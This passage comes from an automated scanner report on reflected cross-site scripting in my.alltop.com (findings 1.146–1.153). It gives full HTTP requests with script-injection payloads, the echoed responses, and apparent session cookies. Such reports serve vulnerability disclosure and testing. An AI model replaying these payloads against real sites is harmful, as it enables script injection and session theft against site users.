GET /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)cf340"><script>alert(1)</script>fc2ec1a21ae HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:49 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)cf340"><script>alert(1)</script>fc2ec1a21ae" method="post" accept-charset="utf-8">
...[SNIP]...

1.146. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee6f"><script>alert(1)</script>fbb94190503 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)?3ee6f"><script>alert(1)</script>fbb94190503=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:44 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)?3ee6f"><script>alert(1)</script>fbb94190503=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.147. http://my.alltop.com/alpha/i ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001E8)</script> request parameter is copied into the HTML document as plain text between tags. The payload 73184<script>alert(1)</script>60e04424cf4 was submitted in the '"--></style></script><script>netsparker(0x0001E8)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i?'"--></style></script><script>netsparker(0x0001E8)</script>73184<script>alert(1)</script>60e04424cf4 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>73184<script>alert(1)</script>60e04424cf4" method="post" accept-charset="utf-8">
...[SNIP]...

1.148. http://my.alltop.com/alpha/i [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e70"><script>alert(1)</script>fd251c20445 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i13e70"><script>alert(1)</script>fd251c20445 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i13e70"><script>alert(1)</script>fd251c20445" method="post" accept-charset="utf-8">
...[SNIP]...

1.149. http://my.alltop.com/alpha/i [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89c3"><script>alert(1)</script>89c007470ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i?f89c3"><script>alert(1)</script>89c007470ef=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i?f89c3"><script>alert(1)</script>89c007470ef=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.150. http://my.alltop.com/alpha/i [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03f4"><script>alert(1)</script>3e50c6ccc8d was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000164)%3C/script%3Ec03f4"><script>alert(1)</script>3e50c6ccc8d HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:22 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:22 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000164)%3C/script%3Ec03f4"><script>alert(1)</script>3e50c6ccc8d" method="post" accept-charset="utf-8">
...[SNIP]...

1.151. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7bf9"><script>alert(1)</script>8cc8b9d0f4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3Cc7bf9"><script>alert(1)</script>8cc8b9d0f4c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3Cc7bf9"><script>alert(1)</script>8cc8b9d0f4c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.152. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 966c7"><script>alert(1)</script>21fa30cad5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C966c7"><script>alert(1)</script>21fa30cad5b/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:06 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C966c7"><script>alert(1)</script>21fa30cad5b/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.153. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7863"><script>alert(1)</script>40d22640f71 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3Ce7863"><script>alert(1)</script>40d22640f71/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
